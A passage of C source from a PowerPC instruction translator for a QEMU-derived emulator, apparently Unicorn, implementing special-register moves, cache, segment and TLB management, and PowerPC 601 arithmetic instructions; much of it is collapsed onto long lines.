cpu_gpr[rD(ctx->opcode)], cpu_gpr[rD(ctx->opcode)], crn * 4); } } else { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_mov_i32(tcg_ctx, t0, cpu_crf[0]); tcg_gen_shli_i32(tcg_ctx, t0, t0, 4); tcg_gen_or_i32(tcg_ctx, t0, t0, cpu_crf[1]); tcg_gen_shli_i32(tcg_ctx, t0, t0, 4); tcg_gen_or_i32(tcg_ctx, t0, t0, cpu_crf[2]); tcg_gen_shli_i32(tcg_ctx, t0, t0, 4); tcg_gen_or_i32(tcg_ctx, t0, t0, cpu_crf[3]); tcg_gen_shli_i32(tcg_ctx, t0, t0, 4); tcg_gen_or_i32(tcg_ctx, t0, t0, cpu_crf[4]); tcg_gen_shli_i32(tcg_ctx, t0, t0, 4); tcg_gen_or_i32(tcg_ctx, t0, t0, cpu_crf[5]); 
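        /*
         * Building the full 32-bit CR image nibble by nibble: after the
         * last OR below, cpu_crf[0] sits in the most significant nibble
         * and cpu_crf[7] in the least.
         */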
tcg_gen_shli_i32(tcg_ctx, t0, t0, 4); tcg_gen_or_i32(tcg_ctx, t0, t0, cpu_crf[6]); tcg_gen_shli_i32(tcg_ctx, t0, t0, 4); tcg_gen_or_i32(tcg_ctx, t0, t0, cpu_crf[7]); tcg_gen_extu_i32_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0); tcg_temp_free_i32(tcg_ctx, t0); } } /* mfmsr */ static void gen_mfmsr(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_msr); } static void spr_noaccess(DisasContext *ctx, int gprn, int sprn) { } #define SPR_NOACCESS (&spr_noaccess) /* mfspr */ static inline void gen_op_mfspr(DisasContext *ctx) { void (*read_cb)(DisasContext *ctx, int gprn, int sprn); uint32_t sprn = SPR(ctx->opcode); if (ctx->pr) { read_cb = ctx->spr_cb[sprn].uea_read; } else if (ctx->hv) { read_cb = ctx->spr_cb[sprn].hea_read; } else { read_cb = ctx->spr_cb[sprn].oea_read; } if (likely(read_cb != NULL)) { if (likely(read_cb != SPR_NOACCESS)) { (*read_cb)(ctx, rD(ctx->opcode), sprn); } else { /* Privilege exception */ /* * This is a hack to avoid warnings when running Linux: * this OS breaks the PowerPC virtualisation model, * allowing userland application to read the PVR */ if (sprn != SPR_PVR) { qemu_log_mask(LOG_GUEST_ERROR, "Trying to read privileged spr " "%d (0x%03x) at " TARGET_FMT_lx "\n", sprn, sprn, ctx->base.pc_next - 4); } gen_priv_exception(ctx, POWERPC_EXCP_PRIV_REG); } } else { /* ISA 2.07 defines these as no-ops */ if ((ctx->insns_flags2 & PPC2_ISA207S) && (sprn >= 808 && sprn <= 811)) { /* This is a nop */ return; } /* Not defined */ qemu_log_mask(LOG_GUEST_ERROR, "Trying to read invalid spr %d (0x%03x) at " TARGET_FMT_lx "\n", sprn, sprn, ctx->base.pc_next - 4); /* * The behaviour depends on MSR:PR and SPR# bit 0x10, it can * generate a priv, a hv emu or a no-op */ if (sprn & 0x10) { if (ctx->pr) { gen_priv_exception(ctx, POWERPC_EXCP_INVAL_SPR); } } else { if (ctx->pr || sprn == 0 || sprn == 4 || sprn == 5 || sprn == 6) { gen_hvpriv_exception(ctx, POWERPC_EXCP_INVAL_SPR); } } } } static void gen_mfspr(DisasContext *ctx) { gen_op_mfspr(ctx); } /* mftb */ static void gen_mftb(DisasContext *ctx) { gen_op_mfspr(ctx); } /* mtcrf mtocrf*/ static void gen_mtcrf(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t crm, crn; crm = CRM(ctx->opcode); if (likely((ctx->opcode & 0x00100000))) { if (crm && ((crm & (crm - 1)) == 0)) { TCGv_i32 temp = tcg_temp_new_i32(tcg_ctx); crn = ctz32(crm); tcg_gen_trunc_tl_i32(tcg_ctx, temp, cpu_gpr[rS(ctx->opcode)]); tcg_gen_shri_i32(tcg_ctx, temp, temp, crn * 4); tcg_gen_andi_i32(tcg_ctx, cpu_crf[7 - crn], temp, 0xf); tcg_temp_free_i32(tcg_ctx, temp); } } else { TCGv_i32 temp = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, temp, cpu_gpr[rS(ctx->opcode)]); for (crn = 0 ; crn < 8 ; crn++) { if (crm & (1 << crn)) { tcg_gen_shri_i32(tcg_ctx, cpu_crf[7 - crn], temp, crn * 4); tcg_gen_andi_i32(tcg_ctx, cpu_crf[7 - crn], cpu_crf[7 - crn], 0xf); } } tcg_temp_free_i32(tcg_ctx, temp); } } /* mtmsr */ #if defined(TARGET_PPC64) static void gen_mtmsrd(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } if (ctx->opcode & 0x00010000) { /* L=1 form only updates EE and RI */ TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], (1 << MSR_RI) | (1 << MSR_EE)); tcg_gen_andi_tl(tcg_ctx, t1, cpu_msr, ~(target_ulong)((1 << MSR_RI) | (1 << MSR_EE))); tcg_gen_or_tl(tcg_ctx, t1, t1, t0); gen_helper_store_msr(tcg_ctx, 
tcg_ctx->cpu_env, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } else { /* * XXX: we need to update nip before the store if we enter * power saving mode, we will exit the loop directly from * ppc_store_msr */ gen_update_nip(ctx, ctx->base.pc_next); gen_helper_store_msr(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rS(ctx->opcode)]); } /* Must stop the translation as machine state (may have) changed */ gen_stop_exception(ctx); } #endif /* defined(TARGET_PPC64) */ static void gen_mtmsr(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } if (ctx->opcode & 0x00010000) { /* L=1 form only updates EE and RI */ TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], (1 << MSR_RI) | (1 << MSR_EE)); tcg_gen_andi_tl(tcg_ctx, t1, cpu_msr, ~(target_ulong)((1 << MSR_RI) | (1 << MSR_EE))); tcg_gen_or_tl(tcg_ctx, t1, t1, t0); gen_helper_store_msr(tcg_ctx, tcg_ctx->cpu_env, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } else { TCGv msr = tcg_temp_new(tcg_ctx); /* * XXX: we need to update nip before the store if we enter * power saving mode, we will exit the loop directly from * ppc_store_msr */ gen_update_nip(ctx, ctx->base.pc_next); #if defined(TARGET_PPC64) tcg_gen_deposit_tl(tcg_ctx, msr, cpu_msr, cpu_gpr[rS(ctx->opcode)], 0, 32); #else tcg_gen_mov_tl(tcg_ctx, msr, cpu_gpr[rS(ctx->opcode)]); #endif gen_helper_store_msr(tcg_ctx, tcg_ctx->cpu_env, msr); tcg_temp_free(tcg_ctx, msr); } /* Must stop the translation as machine state (may have) changed */ gen_stop_exception(ctx); } /* mtspr */ static void gen_mtspr(DisasContext *ctx) { void (*write_cb)(DisasContext *ctx, int sprn, int gprn); uint32_t sprn = SPR(ctx->opcode); if (ctx->pr) { write_cb = ctx->spr_cb[sprn].uea_write; } else if (ctx->hv) { write_cb = ctx->spr_cb[sprn].hea_write; } else { write_cb = ctx->spr_cb[sprn].oea_write; } if (likely(write_cb != NULL)) { if (likely(write_cb != SPR_NOACCESS)) { (*write_cb)(ctx, sprn, rS(ctx->opcode)); } else { /* Privilege exception */ qemu_log_mask(LOG_GUEST_ERROR, "Trying to write privileged spr " "%d (0x%03x) at " TARGET_FMT_lx "\n", sprn, sprn, ctx->base.pc_next - 4); gen_priv_exception(ctx, POWERPC_EXCP_PRIV_REG); } } else { /* ISA 2.07 defines these as no-ops */ if ((ctx->insns_flags2 & PPC2_ISA207S) && (sprn >= 808 && sprn <= 811)) { /* This is a nop */ return; } /* Not defined */ qemu_log_mask(LOG_GUEST_ERROR, "Trying to write invalid spr %d (0x%03x) at " TARGET_FMT_lx "\n", sprn, sprn, ctx->base.pc_next - 4); /* * The behaviour depends on MSR:PR and SPR# bit 0x10, it can * generate a priv, a hv emu or a no-op */ if (sprn & 0x10) { if (ctx->pr) { gen_priv_exception(ctx, POWERPC_EXCP_INVAL_SPR); } } else { if (ctx->pr || sprn == 0) { gen_hvpriv_exception(ctx, POWERPC_EXCP_INVAL_SPR); } } } } #if defined(TARGET_PPC64) /* setb */ static void gen_setb(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t8 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tm1 = tcg_temp_new_i32(tcg_ctx); int crf = crfS(ctx->opcode); tcg_gen_setcondi_i32(tcg_ctx, TCG_COND_GEU, t0, cpu_crf[crf], 4); tcg_gen_movi_i32(tcg_ctx, t8, 8); tcg_gen_movi_i32(tcg_ctx, tm1, -1); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_GEU, t0, cpu_crf[crf], t8, tm1, t0); tcg_gen_ext_i32_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0); tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t8); tcg_temp_free_i32(tcg_ctx, tm1); } #endif /*** 
Cache management ***/

/* dcbf */
static void gen_dcbf(DisasContext *ctx)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    /* XXX: specification says this is treated as a load by the MMU */
    TCGv t0;
    gen_set_access_type(ctx, ACCESS_CACHE);
    t0 = tcg_temp_new(tcg_ctx);
    gen_addr_reg_index(ctx, t0);
    gen_qemu_ld8u(ctx, t0, t0);
    tcg_temp_free(tcg_ctx, t0);
}

/* dcbfep (external PID dcbf) */
static void gen_dcbfep(DisasContext *ctx)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    /* XXX: specification says this is treated as a load by the MMU */
    TCGv t0;
    CHK_SV;
    gen_set_access_type(ctx, ACCESS_CACHE);
    t0 = tcg_temp_new(tcg_ctx);
    gen_addr_reg_index(ctx, t0);
    tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, PPC_TLB_EPID_LOAD, DEF_MEMOP(MO_UB));
    tcg_temp_free(tcg_ctx, t0);
}

/* dcbi (Supervisor only) */
static void gen_dcbi(DisasContext *ctx)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv EA, val;

    CHK_SV;
    EA = tcg_temp_new(tcg_ctx);
    gen_set_access_type(ctx, ACCESS_CACHE);
    gen_addr_reg_index(ctx, EA);
    val = tcg_temp_new(tcg_ctx);
    /* XXX: specification says this should be treated as a store by the MMU */
    gen_qemu_ld8u(ctx, val, EA);
    gen_qemu_st8(ctx, val, EA);
    tcg_temp_free(tcg_ctx, val);
    tcg_temp_free(tcg_ctx, EA);
}

/* dcbst */
static void gen_dcbst(DisasContext *ctx)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    /* XXX: specification says this is treated as a load by the MMU */
    TCGv t0;
    gen_set_access_type(ctx, ACCESS_CACHE);
    t0 = tcg_temp_new(tcg_ctx);
    gen_addr_reg_index(ctx, t0);
    gen_qemu_ld8u(ctx, t0, t0);
    tcg_temp_free(tcg_ctx, t0);
}

/* dcbstep (dcbstep External PID version) */
static void gen_dcbstep(DisasContext *ctx)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    /* XXX: specification says this is treated as a load by the MMU */
    TCGv t0;
    gen_set_access_type(ctx, ACCESS_CACHE);
    t0 = tcg_temp_new(tcg_ctx);
    gen_addr_reg_index(ctx, t0);
    tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, PPC_TLB_EPID_LOAD, DEF_MEMOP(MO_UB));
    tcg_temp_free(tcg_ctx, t0);
}

/* dcbt */
static void gen_dcbt(DisasContext *ctx)
{
    /*
     * interpreted as no-op
     * XXX: specification says this is treated as a load by the MMU but
     * does not generate any exception
     */
}

/* dcbtep */
static void gen_dcbtep(DisasContext *ctx)
{
    /*
     * interpreted as no-op
     * XXX: specification says this is treated as a load by the MMU but
     * does not generate any exception
     */
}

/* dcbtst */
static void gen_dcbtst(DisasContext *ctx)
{
    /*
     * interpreted as no-op
     * XXX: specification says this is treated as a load by the MMU but
     * does not generate any exception
     */
}

/* dcbtstep */
static void gen_dcbtstep(DisasContext *ctx)
{
    /*
     * interpreted as no-op
     * XXX: specification says this is treated as a load by the MMU but
     * does not generate any exception
     */
}

/* dcbtls */
static void gen_dcbtls(DisasContext *ctx)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    /* Always fails locking the cache */
    TCGv t0 = tcg_temp_new(tcg_ctx);
    gen_load_spr(tcg_ctx, t0, SPR_Exxx_L1CSR0);
    tcg_gen_ori_tl(tcg_ctx, t0, t0, L1CSR0_CUL);
    gen_store_spr(tcg_ctx, SPR_Exxx_L1CSR0, t0);
    tcg_temp_free(tcg_ctx, t0);
}

/* dcbz */
static void gen_dcbz(DisasContext *ctx)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv tcgv_addr;
    TCGv_i32 tcgv_op;

    gen_set_access_type(ctx, ACCESS_CACHE);
    tcgv_addr = tcg_temp_new(tcg_ctx);
    tcgv_op = tcg_const_i32(tcg_ctx, ctx->opcode & 0x03FF000);
    gen_addr_reg_index(ctx, tcgv_addr);
    gen_helper_dcbz(tcg_ctx, tcg_ctx->cpu_env, tcgv_addr, tcgv_op);
    tcg_temp_free(tcg_ctx, tcgv_addr);
    tcg_temp_free_i32(tcg_ctx, tcgv_op);
}

/* dcbzep */
static void gen_dcbzep(DisasContext *ctx)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv tcgv_addr;
    TCGv_i32 tcgv_op;

    gen_set_access_type(ctx, ACCESS_CACHE);
    tcgv_addr = tcg_temp_new(tcg_ctx);
    tcgv_op = tcg_const_i32(tcg_ctx, ctx->opcode & 0x03FF000);
    gen_addr_reg_index(ctx, tcgv_addr);
    gen_helper_dcbzep(tcg_ctx, tcg_ctx->cpu_env, tcgv_addr, tcgv_op);
    tcg_temp_free(tcg_ctx, tcgv_addr);
    tcg_temp_free_i32(tcg_ctx, tcgv_op);
}

/* dst / dstt */
static void gen_dst(DisasContext *ctx)
{
    if (rA(ctx->opcode) == 0) {
        gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL);
    } else {
        /* interpreted as no-op */
    }
}

/* dstst / dststt */
static void gen_dstst(DisasContext *ctx)
{
    if (rA(ctx->opcode) == 0) {
        gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL);
    } else {
        /* interpreted as no-op */
    }
}

/* dss / dssall */
static void gen_dss(DisasContext *ctx)
{
    /* interpreted as no-op */
}

/* icbi */
static void gen_icbi(DisasContext *ctx)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv t0;
    gen_set_access_type(ctx, ACCESS_CACHE);
    t0 = tcg_temp_new(tcg_ctx);
    gen_addr_reg_index(ctx, t0);
    gen_helper_icbi(tcg_ctx, tcg_ctx->cpu_env, t0);
    tcg_temp_free(tcg_ctx, t0);
}

/* icbiep */
static void gen_icbiep(DisasContext *ctx)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv t0;
    gen_set_access_type(ctx, ACCESS_CACHE);
    t0 = tcg_temp_new(tcg_ctx);
    gen_addr_reg_index(ctx, t0);
    gen_helper_icbiep(tcg_ctx, tcg_ctx->cpu_env, t0);
    tcg_temp_free(tcg_ctx, t0);
}

/* Optional: */
/* dcba */
static void gen_dcba(DisasContext *ctx)
{
    /*
     * interpreted as no-op
     * XXX: specification says this is treated as a store by the MMU
     * but does not generate any exception
     */
}

/*** Segment register manipulation ***/

/* Supervisor only: */
/* mfsr */
static void gen_mfsr(DisasContext *ctx)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv t0;

    CHK_SV;
    t0 = tcg_const_tl(tcg_ctx, SR(ctx->opcode));
    gen_helper_load_sr(tcg_ctx, cpu_gpr[rD(ctx->opcode)], tcg_ctx->cpu_env, t0);
    tcg_temp_free(tcg_ctx, t0);
}

/* mfsrin */
static void gen_mfsrin(DisasContext *ctx)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv t0;

    CHK_SV;
    t0 = tcg_temp_new(tcg_ctx);
    tcg_gen_extract_tl(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)], 28, 4);
    gen_helper_load_sr(tcg_ctx, cpu_gpr[rD(ctx->opcode)], tcg_ctx->cpu_env, t0);
    tcg_temp_free(tcg_ctx, t0);
}

/* mtsr */
static void gen_mtsr(DisasContext *ctx)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv t0;

    CHK_SV;
    t0 = tcg_const_tl(tcg_ctx, SR(ctx->opcode));
    gen_helper_store_sr(tcg_ctx, tcg_ctx->cpu_env, t0, cpu_gpr[rS(ctx->opcode)]);
    tcg_temp_free(tcg_ctx, t0);
}

/* mtsrin */
static void gen_mtsrin(DisasContext *ctx)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv t0;

    CHK_SV;
    t0 = tcg_temp_new(tcg_ctx);
    tcg_gen_extract_tl(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)], 28, 4);
    gen_helper_store_sr(tcg_ctx, tcg_ctx->cpu_env, t0, cpu_gpr[rD(ctx->opcode)]);
    tcg_temp_free(tcg_ctx, t0);
}

#if defined(TARGET_PPC64)
/* Specific implementation for PowerPC 64 "bridge" emulation using SLB */

/* mfsr */
static void gen_mfsr_64b(DisasContext *ctx)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv t0;

    CHK_SV;
    t0 = tcg_const_tl(tcg_ctx, SR(ctx->opcode));
    gen_helper_load_sr(tcg_ctx, cpu_gpr[rD(ctx->opcode)], tcg_ctx->cpu_env, t0);
    tcg_temp_free(tcg_ctx, t0);
}

/* mfsrin */
static void gen_mfsrin_64b(DisasContext *ctx)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv t0;

    CHK_SV;
    t0 = tcg_temp_new(tcg_ctx);
    tcg_gen_extract_tl(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)], 28, 4);
    gen_helper_load_sr(tcg_ctx, cpu_gpr[rD(ctx->opcode)], tcg_ctx->cpu_env, t0);
    tcg_temp_free(tcg_ctx, t0);
}

/* mtsr */
static void gen_mtsr_64b(DisasContext *ctx)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
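    /*
     * As in the 32-bit variant, SR(ctx->opcode) is the 4-bit segment
     * register number; in this "bridge" mode the helper is expected to
     * back the SR with a matching SLB entry (see the comment above).
     */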
TCGv t0; CHK_SV; t0 = tcg_const_tl(tcg_ctx, SR(ctx->opcode)); gen_helper_store_sr(tcg_ctx, tcg_ctx->cpu_env, t0, cpu_gpr[rS(ctx->opcode)]); tcg_temp_free(tcg_ctx, t0); } /* mtsrin */ static void gen_mtsrin_64b(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; CHK_SV; t0 = tcg_temp_new(tcg_ctx); tcg_gen_extract_tl(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)], 28, 4); gen_helper_store_sr(tcg_ctx, tcg_ctx->cpu_env, t0, cpu_gpr[rS(ctx->opcode)]); tcg_temp_free(tcg_ctx, t0); } /* slbmte */ static void gen_slbmte(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; gen_helper_store_slb(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rB(ctx->opcode)], cpu_gpr[rS(ctx->opcode)]); } static void gen_slbmfee(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; gen_helper_load_slb_esid(tcg_ctx, cpu_gpr[rS(ctx->opcode)], tcg_ctx->cpu_env, cpu_gpr[rB(ctx->opcode)]); } static void gen_slbmfev(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; gen_helper_load_slb_vsid(tcg_ctx, cpu_gpr[rS(ctx->opcode)], tcg_ctx->cpu_env, cpu_gpr[rB(ctx->opcode)]); } static void gen_slbfee_(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGLabel *l1, *l2; if (unlikely(ctx->pr)) { gen_inval_exception(ctx, POWERPC_EXCP_PRIV_REG); return; } gen_helper_find_slb_vsid(tcg_ctx, cpu_gpr[rS(ctx->opcode)], tcg_ctx->cpu_env, cpu_gpr[rB(ctx->opcode)]); l1 = gen_new_label(tcg_ctx); l2 = gen_new_label(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, cpu_crf[0], cpu_so); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, cpu_gpr[rS(ctx->opcode)], -1, l1); tcg_gen_ori_i32(tcg_ctx, cpu_crf[0], cpu_crf[0], CRF_EQ); tcg_gen_br(tcg_ctx, l2); gen_set_label(tcg_ctx, l1); tcg_gen_movi_tl(tcg_ctx, cpu_gpr[rS(ctx->opcode)], 0); gen_set_label(tcg_ctx, l2); } #endif /* defined(TARGET_PPC64) */ /*** Lookaside buffer management ***/ /* Optional & supervisor only: */ /* tlbia */ static void gen_tlbia(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_HV; gen_helper_tlbia(tcg_ctx, tcg_ctx->cpu_env); } /* tlbiel */ static void gen_tlbiel(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; gen_helper_tlbie(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rB(ctx->opcode)]); } /* tlbie */ static void gen_tlbie(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t1; if (ctx->gtse) { CHK_SV; /* If gtse is set then tlbie is supervisor privileged */ } else { CHK_HV; /* Else hypervisor privileged */ } if (NARROW_MODE(ctx)) { TCGv t0 = tcg_temp_new(tcg_ctx); tcg_gen_ext32u_tl(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)]); gen_helper_tlbie(tcg_ctx, tcg_ctx->cpu_env, t0); tcg_temp_free(tcg_ctx, t0); } else { gen_helper_tlbie(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rB(ctx->opcode)]); } t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_ld_i32(tcg_ctx, t1, tcg_ctx->cpu_env, offsetof(CPUPPCState, tlb_need_flush)); tcg_gen_ori_i32(tcg_ctx, t1, t1, TLB_NEED_GLOBAL_FLUSH); tcg_gen_st_i32(tcg_ctx, t1, tcg_ctx->cpu_env, offsetof(CPUPPCState, tlb_need_flush)); tcg_temp_free_i32(tcg_ctx, t1); } /* tlbsync */ static void gen_tlbsync(DisasContext *ctx) { if (ctx->gtse) { CHK_SV; /* If gtse is set then tlbsync is supervisor privileged */ } else { CHK_HV; /* Else hypervisor privileged */ } /* BookS does both ptesync and tlbsync make tlbsync a nop for server */ if (ctx->insns_flags & PPC_BOOKE) { gen_check_tlb_flush(ctx, true); } } #if defined(TARGET_PPC64) /* slbia */ static void gen_slbia(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t ih = (ctx->opcode >> 21) & 0x7; TCGv_i32 t0 = 
tcg_const_i32(tcg_ctx, ih); CHK_SV; gen_helper_slbia(tcg_ctx, tcg_ctx->cpu_env, t0); tcg_temp_free_i32(tcg_ctx, t0); } /* slbie */ static void gen_slbie(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; gen_helper_slbie(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rB(ctx->opcode)]); } /* slbieg */ static void gen_slbieg(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; gen_helper_slbieg(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rB(ctx->opcode)]); } /* slbsync */ static void gen_slbsync(DisasContext *ctx) { CHK_SV; gen_check_tlb_flush(ctx, true); } #endif /* defined(TARGET_PPC64) */ /*** External control ***/ /* Optional: */ /* eciwx */ static void gen_eciwx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; /* Should check EAR[E] ! */ gen_set_access_type(ctx, ACCESS_EXT); t0 = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, t0); tcg_gen_qemu_ld_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0, ctx->mem_idx, DEF_MEMOP(MO_UL | MO_ALIGN)); tcg_temp_free(tcg_ctx, t0); } /* ecowx */ static void gen_ecowx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; /* Should check EAR[E] ! */ gen_set_access_type(ctx, ACCESS_EXT); t0 = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, t0); tcg_gen_qemu_st_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0, ctx->mem_idx, DEF_MEMOP(MO_UL | MO_ALIGN)); tcg_temp_free(tcg_ctx, t0); } /* PowerPC 601 specific instructions */ /* abs - abs. */ static void gen_abs(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv d = cpu_gpr[rD(ctx->opcode)]; TCGv a = cpu_gpr[rA(ctx->opcode)]; tcg_gen_abs_tl(tcg_ctx, d, a); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, d); } } /* abso - abso. */ static void gen_abso(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv d = cpu_gpr[rD(ctx->opcode)]; TCGv a = cpu_gpr[rA(ctx->opcode)]; tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, cpu_ov, a, 0x80000000); tcg_gen_abs_tl(tcg_ctx, d, a); tcg_gen_or_tl(tcg_ctx, cpu_so, cpu_so, cpu_ov); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, d); } } /* clcs */ static void gen_clcs(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_const_i32(tcg_ctx, rA(ctx->opcode)); gen_helper_clcs(tcg_ctx, cpu_gpr[rD(ctx->opcode)], tcg_ctx->cpu_env, t0); tcg_temp_free_i32(tcg_ctx, t0); /* Rc=1 sets CR0 to an undefined state */ } /* div - div. */ static void gen_div(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_div(tcg_ctx, cpu_gpr[rD(ctx->opcode)], tcg_ctx->cpu_env, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rD(ctx->opcode)]); } } /* divo - divo. */ static void gen_divo(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_divo(tcg_ctx, cpu_gpr[rD(ctx->opcode)], tcg_ctx->cpu_env, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rD(ctx->opcode)]); } } /* divs - divs. */ static void gen_divs(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_divs(tcg_ctx, cpu_gpr[rD(ctx->opcode)], tcg_ctx->cpu_env, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rD(ctx->opcode)]); } } /* divso - divso. 
*/ static void gen_divso(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_divso(tcg_ctx, cpu_gpr[rD(ctx->opcode)], tcg_ctx->cpu_env, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rD(ctx->opcode)]); } } /* doz - doz. */ static void gen_doz(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); tcg_gen_brcond_tl(tcg_ctx, TCG_COND_GE, cpu_gpr[rB(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], l1); tcg_gen_sub_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rB(ctx->opcode)], cpu_gpr[rA(ctx->opcode)]); tcg_gen_br(tcg_ctx, l2); gen_set_label(tcg_ctx, l1); tcg_gen_movi_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], 0); gen_set_label(tcg_ctx, l2); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rD(ctx->opcode)]); } } /* dozo - dozo. */ static void gen_dozo(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGLabel *l1 = 